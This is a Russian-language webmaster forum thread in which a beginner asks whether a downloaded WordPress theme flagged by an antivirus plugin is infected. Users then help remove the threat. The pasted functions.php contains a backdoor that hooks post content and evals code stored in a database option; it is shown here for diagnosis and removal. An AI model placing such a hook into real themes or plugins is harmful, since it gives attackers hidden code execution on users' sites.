Антивирь нашел зараженный объект в WordPress 3.5.1

12 3
PM
На сайте с 16.02.2013
Offline
0
1459

Всем доброго времени суток.

Скажу сразу, что в деле сайтостроительства я полный нуб :D: К программированию тоже особо никогда душа не лежала. Так что сильно ногами не бейте, если вопрос окажется дурацким.

Собственно буквально пару дней назад озадачила меня моя вторая половина тем, что хочет вести свой сайт по её творческим интересам. Решил разобраться в этом вопросе и данная тема показалась мне довольно заманчивой.

Зарегил домен, определился с хостингом, поднял сайт и тут сразу словил через установку темы (искал через google) с сайтика, находившегося на самой верхней строчке (http://blogstyle.ru/) тему с вирусом, после установки которой заходя на свой сайт автоматом перекидывает на другой. Через админку поставил тему по дифаулту, но дело это не спасло - также продолжало перебрасывать на тот же говносайт, где предлагалось для решения проблемы связаться с веб-программистом и блаблабла. В общем так-как сайт только поднял, не стал заморачиватся с разруливанием, а тупо убил базу на хостинге и поднял новую. Подумал, что не фортануло с темой и снова с подругой выбрали другую тему с того же сайта, но после установки получился тот же результат, т.е. перенаправленние на сторонний говносайт с моего. Также убил базу и поднял новую.

:madd: Из всего вышеописанного сделал вывод что с говносайта blogstyle.ru лучше ничего не качать, если не хотите потом проблем.

Это было предостережение)). Ну а теперь моя трабла или ложная тревога, пока не понятно.

В общем с другого сайта качнул таки понравившуюся подруге тему, поставил её и на этот раз с работоспособностью все было норм.

Сразу после этого решил первым делом озадачится защитой будущего сайта, помануаил по теме и установил несколько защитных плагинов. И вот один из плагинов, а если быть точным, то AntiVirus выдал мне, что в новой теме найдена вирусня и следующее сообщение:

:confused:Вот теперь вопрос: вирус ли это и его надо выпилить (или лучше полностью выпилить тему) или ложная тревога и можно пропустить?

altezzik
На сайте с 06.11.2011
Offline
247
#1

Да вроде ничего страшного в этом нет.

C
На сайте с 04.02.2005
Offline
291
#2

И да и нет

ну вот с какого бодуна в blogoption пихать что-то исполняемое?

Посмотрите в базе это параметр в таблице options.

R
На сайте с 24.01.2008
Offline
180
#3

ТС качая шаблоны модули со сторонних ресурсов вы подвергаете не только основной сайт к заражению но и соседние, проверьте все шаблоны, модули и т.д. на предмет вирусов.

Если сами не справитесь стучите проверим на все вредоносные скрипты + дадим рекомендации!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
SeVlad
На сайте с 03.11.2008
Offline
1609
#4
PapaMaster:
первым делом озадачится защитой будущего сайта,

Для этого вчера и появился закреплённый топик в этом разделе.

Касаемо непосредственно ВП - уже 4я серия нашего сериала достигает экватора. Стартпост читаем внимательно!

PapaMaster:
Из всего вышеописанного сделал вывод что с говносайта blogstyle.ru лучше ничего не качать, если не хотите потом проблем.

Вообще с помоек ничего качать нельзя. Только с офсайтов!

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
S
На сайте с 03.07.2009
Offline
41
#5

PapaMaster, а что в самой той функции, выложите здесь полный код этого файла.

А вообщее что бы не было проблем с безопасностью, дистрибутивы, сторонние расширения, шаблоны, темы нужно качать с офф. сайтов разработчиков.

Или если очень жаль денег на благодарность разработчику, то скачав с варезника проверяйте каждую строчку кода, что она делает и для чего нужна.

Но лучше поддержать разработчика оплати его труд и иметь качественный, без вирусов продукт и как правило с его тех. поддержкой.

Кодинг на PHP. Разработка расширений под Joomla.
SeVlad
На сайте с 03.11.2008
Offline
1609
#6
sdaprel:
А что в самой той функции, выложите здесь полный код этого файла.

Я-то тут причём?

S
На сайте с 03.07.2009
Offline
41
#7
SeVlad:
Я-то тут причём?

Прошу прощения за мою невнимательность, исправил свой пост.

PM
На сайте с 16.02.2013
Offline
0
#8

Спасибо всем откликнувшимся. Повторюсь что в теме создания сайта я полный 0.

sdaprel:
а что в самой той функции, выложите здесь полный код этого файла.

Вот код:

<?php

add_filter('the_content', '_bloginfo', 10001);

function _bloginfo($content){

global $post;

if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){

return $co;

} else return $content;

}

if ( function_exists('register_sidebar') )

register_sidebar();

?>

sdaprel:
А вообщее что бы не было проблем с безопасностью, дистрибутивы, сторонние расширения, шаблоны, темы нужно качать с офф. сайтов разработчиков.

Спасибо за совет. Там, где я начал тему мануалить, не было ни слова про проблемы с установкой тем и более того рекомендовалось найти тему для сайта именно бесплатно, т.е. тупо погуглить и скачать с первого попавшегося сайта. Что я собственно первый раз и сделал (результат описан в шапке темы))), второй раз видимо вышло более удачно, но тем не менее возможно тоже не без приключений...

SeVlad:
Для этого вчера и появился закреплённый топик в этом разделе.

Спасибо за линк ;).

S
На сайте с 03.07.2009
Offline
41
#9

<?php

if ( function_exists('register_sidebar') )

register_sidebar();

?>

Попробуйте так заменить код. Функциональность темы осталась?

PM
На сайте с 16.02.2013
Offline
0
#10
sdaprel:
Попробуйте так заменить код. Функциональность темы осталась?

Заменил, проверил - вроде всё работает. Теперь антивирь в этой теме ничего плохого не видит.

🤣Спасибо за помощь.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий